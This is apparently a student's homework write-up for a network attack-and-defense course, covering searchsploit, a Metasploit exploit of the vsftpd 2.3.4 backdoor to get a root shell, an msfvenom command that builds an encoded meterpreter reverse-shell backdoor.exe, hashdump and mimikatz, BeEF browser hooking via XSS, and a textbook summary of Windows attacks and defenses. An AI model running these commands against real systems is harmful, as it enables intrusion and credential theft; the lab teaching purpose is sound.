2017-2018-2 20179202《网络攻防技术》第七周作业

漏洞利用之检索与利用

searchsploit 会通过本地的 Exploit-DB查找漏洞信息。需要注意的是,searchsploit 使用 AND 运算符,使用的术语越多,滤除的结果越多。

漏洞利用之Metasploit基础

1.启动服务:

在kali中使用metasploit,需要先使用命令service postgresql start开启PostgreSQL数据库服务,使用命令msfconsole开启metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。

2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework

3.基本命令

  • msfconsole:开启metasploit的console

  • msfvenom:是msfpayload和msfencode的混合体。msfpayload用来生成payload或者shellcode,msfencode是msf中的编码器

4.测试示例

首先用nmap -sV扫描目标主机和端口上运行的软件的版本。结果显示目标主机运行着ftp服务器,且版本为vsftpd 2.3.4(此版本的vsftpd存在着漏洞,攻击者可以远程获取目标主机的root权限)。

下面我们利用metasploit实施攻击。命令行输入msfconsole开启metasploit的console,然后输入search vsftpd,搜索与vsftpd匹配的模块。

exploit/unix/ftp/vsftpd_234_backdoor针对的正好是扫描出的2.3.4版本,接下来就可以利用该模块对目标进行攻击。输入use exploit/unix/ftp/vsftpd_234_backdoor,提示符提示进入到该路径下,show options查看需要设置的相关项。提示需要设置RHOST和RPORT(端口默认为21),set RHOST 192.168.199.139设置目标IP。

接下来选择payload,输入命令set payload,按Tab键自动补齐攻击载荷cmd/unix/interactshow options查看需要设置的相关项,设置结束后输入exploit即可实施攻击。

结果返回目标主机的shell,获取了目标主机的root权限,可以输入命令查看id、网络配置等,攻击也就可以顺利实施。

Meterpreter

Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后绐我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的—个meterpretershell的链接。

1.生成meterpreter后门

选定攻击载荷windows/meterpreter/reverse_tcp(针对windows,反向连接shell),使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.161 LPORT=2333 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe生成后门。

2.监听设置

生成的后门需要有相应的监听。打开metasploit的console,配置一个反弹会话处理程序:

3.meterpreter shell

当目标机器成功执行backdoor.exe后,我们就取得了一个 meterpreter shell 。输入background返回msf,如果想返回meterpreter shell,输入sessions查看ID,输入sessions -i ID选择想返回的会话。

在meterpreter shell中输入help查看可执行的命令,如sysinfo显示目标系统信息,hashdump抓取哈希,pwd显示当前路径等。

meterpreter还有一些扩展工具,使用load + tab键查看这些工具,然后选择所需工具进行使用(load mimikatz 用来抓取系统明文)。

BeEF

对XSS漏洞往往需要一个强大的框架支持,如网络上的XSS平台,在KALI下,BeEf是一款丝毫不逊于XSS平台的工具。BeEf是浏览器攻击框架的简称,是一款专注于浏览器的渗透测试工具,它扩展了跨站漏洞的利用,能hook很多浏览器并可以执行很多内嵌命令。

命令行输入beef-xss,浏览器自动访问页面http://127.0.0.1:3000/ui/authentication,默认用户名和密码都为beef,登录后进入主界面。

我们假设被测试主机由于XSS漏洞请求到页面http://127.0.0.1:3000/demod/basic.html,这是一个测试页面,如果通过XSS把该页面加入页面请求中,也就是说每个访问某个页面的人都会访问该页面,则访问者就会被BeEF hook 到,即加入到 Online Browsers中。

这样在主界面左端就可以看到一个在线主机。右侧 Current Browser 标签页中显示一系列信息。

HOOK持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令。

我们以MISC下的Raw JavaScript模块为例进行测试,右端输入 Javascript code 给目标弹出窗口,点击Excute进行攻击。

如果成功,会弹出窗口提示:

这时 Command results 显示result=It worked!

下面介绍BeEF的Proxy功能。选中目标主机,点击右键,在菜单中选中use as Proxy。

在Rider选项卡中的 Forge Request 编辑并发送想要发送的内容,这里我们保持默认。

点击send,在History选项卡中会显示执行请求的信息。

执行完毕后(Processed显示complete)点击该条目,查看包的细节。借助于此,可以让目标访问特定的页面,如果特定页面有漏洞,就会中招 。

以上就是依赖目标做一个代理,然后请求一个特定页面的过程。BeEF还能够配合Metasploit进一步渗透主机。BeEF 默认不加载 Metasploit,如果要使用 Metasploit 丰富的攻击模块,需要做以下配置。

首先进入目录/usr/share/beef-xss/,修改 config.yaml 文件,将metasploit设置为true。

然后进入目录/usr/share/beef-xss/extensions/metasploit,修改 config.yaml 文件,host和callback_host设置成本机IP地址,然后再修改Custom路径即可。

设置完成后打开msfconsole,输入命令load msgrpc ServerHost=192.168.199.162 Pass=abc123

此时进入目录/usr/share/beef-xss/,执行./beef -x命令,重新加载metasploit模块。

service beef-xss start命令重启服务,然后重新登陆 BeEF,metasploit下增加了很多可以使用的模块,现在就可以使用metasploit的模块进行攻击了。

教材总结

一、Windows操作系统基本框架

1.windows基本结构分为运行于处理器特权模式的操作系统内核以及运行在处理器非特权模式的用户,即为内核态和用户态。

2.内核态:windows执行体、windows内核体、设备驱动程序、硬件抽象层、windows窗口与图形界面接口。

3.用户态:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

4.核心机制:进程和线程管理机制、内存管理机制、文件管理机制、注册表管理机制、网络管理机制。

5.网络管理机制:网卡硬件驱动程序(物理层)、NDIS库以及miniport驱动程序(链路层)、TDI传输层(网络协议驱动)(网络层和传输层)、网络APID以及TDI客户端(会话层和表示层)、网络应用程序和服务进程(应用层)。

二、安全体系结构和机制

1.监控器模型:主体到客体的访问都通过监控器作中间,由引用监控器根据安全访问控制策略来进行授权访问,所有访问记录都由监控器生成审计日志。

2.核心:SRM安全引用监控器(内核中)、LSASS安全服务(用户态)、winlogon/netlogn、以及Eventlog

3.身份认证机制:

  • 安全主体:用户、用户组、计算机
  • 身份认证:本地身份认证(winlogon进程、GINA图形化登录窗口与LSASS服务)、网络身份认证(NTLM、Lanman、kerberos)

4.授权与访问控制机制:

  • 对象:文件,目录,注册表键值,内核对象,同步对象,私有对象,管道,内存,通信接口。
  • 属性组成:Owner SID,Group SID,DACL自主访问控制列表,SACL系统审计访问控制列表。

5.安全审计机制

6.其他安全机制:安全中心(防火墙、补丁自动更新、病毒防护),IPsec加载和验证机制,EPS加密文件系统,windows文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制。

三、远程安全攻防技术

1.包括远程口令猜解攻击、windows网络服务攻击,windows客户端和用户攻击。

2.生命周期:

  • windows安全漏洞发现,利用与修补过程
  • 安全漏洞公开披露信息库:CVE,NVD,SecyrityFocus,OSVDB
  • 针对特定目标的渗透测试攻击过程:漏洞扫描测试、查找针对发现漏洞的渗透代码、实施渗透测试
  • 使用metasploit软件实施渗透测试:用户接口(CLI、Console,web,GUI)

3.远程口令猜解攻击:

  • 远程口令猜解:SMB协议(tcp445、tcp139),其他包括WMI服务、TS远程桌面终端服务,MY SQL数据库服务、SharePoint。工具包括:Legion、enum、smbgrind、NTScan、XScan、流光
  • 远程口令字交换通信窃听与破解:NTLM、Lanman、NTLMV2和kerberos网络认证协议的弱点。
  • 远程口令猜解的防范:关闭不必要的易受攻击的网络服务、配置主机防火墙来限制某些端口服务、网络防火墙限制这些服务的访问、禁用过时且有安全缺陷的Lanman和NTLM、指定强口令策略。

4.网络服务远程渗透攻击:针对NETBIOS服务的著名漏洞和攻击、针对SMB服务的著名漏洞和攻击、针对MSRPC服务的著名漏洞和攻击、针对windows系统上微软网络的远程渗透攻击、针对windows系统上第三方服务的远程渗透攻击。

防范措施:最基本的是尽量避免与消除这些渗透攻击所依赖的服务软件安全漏洞。

四、本地安全攻防技术

1.本地提权攻击:利用操作系统内核、特权用户启动程序中安全缺陷与漏洞,原因是服务器和桌面系统没有即时进行补丁更新。

2.敏感信息窃取:

  • windows系统口令密文提取技术(拷贝口令密文文件、rdisk工具备份、pwdumpx从SAM文件或者活动目录中提取口令密文)
  • windows系统口令字破解技术(L0phtCrack、John the Ripper、Cain)
  • 用户敏感数据窃取:find、findstr、grep、meterpreter
  • 本地敏感信息窃取防范:选择高强度、高防御的口令,使用更安全的加密明文算法,安全配置策略。

五、windows消灭踪迹

1.消灭踪迹关闭审计功能、清理事件日志。

防范措施:事先设置系统审计和网络服务审计,日志记录在不可擦除的CDROM上。

2.远控和后门程序

  • 远控:命令行远控工具(Netcat,psexec,meterpreter),图形化远控工具(VNC,RemoteAdmin,PCanyware)
  • 后门程序:国外(BO、BO2K),国内(冰河、灰鸽子、广外女生、PCshare、磁碟机、机器狗等)
  • 防范措施:后门检测软件、杀软、rootkitrerealer、IcSword。

原文地址:https://www.cnblogs.com/Jspo/p/8908577.html

时间: 2024-11-06 03:31:07

2017-2018-2 20179202《网络攻防技术》第七周作业的相关文章

2017-2018-2 20179305《网络攻防技术》第二周作业

Q1 国内外著名黑客介绍 1.国内著名黑客黄鑫简介 黄鑫,网名木马冰河,毕业于西安电子科技大学,职业是网络安全网站"安全焦点"冰河木马软件的创作者. 99年,木马虽然已经在黑客中间遍布使用,但多数为国外的BO和BUS等木马,对于一些刚接触黑客的生手来说,理解这些软件的使用方法和熟练使用这些软件无疑成为了"通往黑客道路"上的最大的难题,此外这些木马多数能够被杀毒软件擒获,使得国内的黑客多数不愿意去用木马.正当国内大多数黑客们苦苦寻觅新的国外木马时,一款中国人自己的编写

2017-2018-2 20179202《网络攻防技术》第二周作业

一.黑客信息 袁仁广,中国国家信息安全漏洞库特聘专家,北京奥运会特聘信息安全专家,现任腾讯湛泸实验室负责人.其领衔的360漏洞研究实验室被誉为"东半球最强大的白帽子军团".他在windows系统方面的造诣,在国内应该是绝对一流.(详见 黑客袁哥:关于我的几个故事) 凯文·米特尼克(Kevin Mitnick)被称为世界上"头号电脑黑客".他是第一个在美国联邦调查局"悬赏捉拿"海报上露面的黑客.他闯入了"北美空中防务指挥系统"的

《网络攻防》第七周学习总结

Kali教材学习 本周主要学习了<网络攻防---技术与实践>第7章的内容,主要学习了 Windows操作系统安全攻防         Windows操作系统基本框架 如上图所示,Windows操作系统分为运行于处理器特权模式(ring 0)的操作系统内核,以及运行在处理器非特权模式(ring 3)的用户空间代码.采用宏内核(monolithic)模式进行架构.内核基本模块分为:Windows执行体 .Windows内核体 .设备驱动程序 .硬件抽象层 .Windows窗口与图形界面内核实现代码

2017-2018-2 20179317 《网络攻防技术》 第四周作业

网络嗅探技术定义:(1)利用计算机网络接口截获目的地为其他计算机的数据报文(2)监听网络流中所包含的用户账户密码或私密信息等.网络嗅探器(Sniffer):(1)实现嗅探的软件或硬件设备.(2)嗅探获得数据→二进制格式数据报文.(3)解析和理解二进制数据,获取各层协议字段和应用层传输数据→网络协议分析.载波侦听/冲突检测(CSMA/CD)技术:(1)载波侦听是指在网络中的每个站点都具有同等的权利,在传输自己的数据时,首先监听信道是否空闲.如果空闲,就传输自己的数据.如果信道被占用,就等待信道空闲

2017-2018-2 《网络攻防》第五周作业

一Kali视频学习 1.bbqsql 2.HexorBase 3.Jsql 4.Oscanner 5.SIDGusser 6.Sqlsus 7.burpsuits 8.owasp zap 9.webscarab 10.fuzzing工具集 二<网络攻防>学习总结 Web安全攻防技术与实现 web应用程序体系结构及其安全威胁 web应用体系结构 浏览器 web服务器 web应用程序 数据库 传输协议http/https web应用安全威胁 针对浏览器和终端用户的web浏览安全威胁 针对传输网络的

2017-2018-2 20179209《网络攻防》第五周作业

网络攻防之Web渗透 视频学习 数据库评估软件 bbqsql bbqsql是一个Python编写的盲注工具,当检测可疑的注入漏洞时会很有用,同时bbqsql是一个半自动工具,允许客户自定参数. DBPwAudit DBPwAudit是一个数据库用户名和密码枚举工具. HexorBase 图形化的密码破解与连接工具,开源. jsql jsql是一款轻量级安全测试工具,可以探测SQL注入漏洞,它跨平台,开源免费,将存在注入漏洞的URL贴进来即可进行漏洞利用,图形化界面亲民,但使用效果有待提高. MD

2017-2018-2 20179226 《网络攻防》第7周作业

课程学习 1.windows操作系统内核实现的核心机制有: 1)Windows进程和线程管理机制 2)Windows内存管理机制 3)Windows文件管理机制(NTFS) 4)Windows注册表管理机制(注册表中的系统自启动挂接点上注册的应用软件可以随系统引导而自动运行,因此也是很多恶意代码及流氓软件普遍的攻击目标) 5)Windows的网络机制(从OSI网络参考模型的物理层到应用层,各层上对应的Windows网络组件模块) 2.Windows授权与访问控制机制 Windows的授权与访问控

2017-2018-1 20179206《网络攻防实践》第一周作业

a.你对师生关系的理解,希望是哪种关系? 我认为师生关系是一种相互平等交流的关系. 为什么这样说,因为这是由网络攻防实践这门可得特殊性来决定的,网络攻防是门实践课,需要大量的联练习和摸索,同时大部分学生对这一领域不熟悉,需要学习Linux在内的很多新东西,在中间会产生大量的新问题,这些问题需要向老师请教,如果能够尽可能的成为一种相互平等的关系,同学会更乐于去发现问题和请教问题,从而能爱上实践,爱上这门课. b.如何提问? l 提问的内容要先自我独立解决: 作为一门计算机实践课,首先放在第一位的就

2017-2018-2 20179215《网络攻防实践》第一周作业

<网络攻防开发与实践> 第一周作业 一.对师生关系的理解 ?对于研究生和导师的关系就不像中学或大学,仅仅是以传授知识为主,研究生阶段,导师起到引路的作用,给学生指点以及方向,而不仅仅是教学,传授的更应该是方法,因为此时研究生阶段学生有了自己的思想,对事物能进行更深刻的思考,想法往往更加新颖,所以导师引领方向,学生开拓创新. 二.如何提问 顺应:从对方观点中延展出你的问题,不要另起炉灶: 提升:把对方所讲的内容,归纳.升华.拔高,成为更具有概括性,更深刻的大问题,再从这个大问题出发提出你自己具体

2017-2018-2 20179209《网络攻防》第八周作业

本周学习目标 掌握Linux系统架构 掌握Linux系统安全架构和机制 掌握Linux系统安全攻防技术 视频学习 SET工具 SET(Social Engineering Toolkit)是一个开源.python驱动的社会工程学渗透测试工具,提供了非常丰富的攻击向量库.是开源的社会工程学利用套件,通常结合metasploit来使用. setoolkit命令开启SET. 攻击模块: 鱼叉式钓鱼攻击 网站攻击 介质感染攻击 创建patload并监听 群发邮件攻击 基于arduino的攻击 短信欺骗攻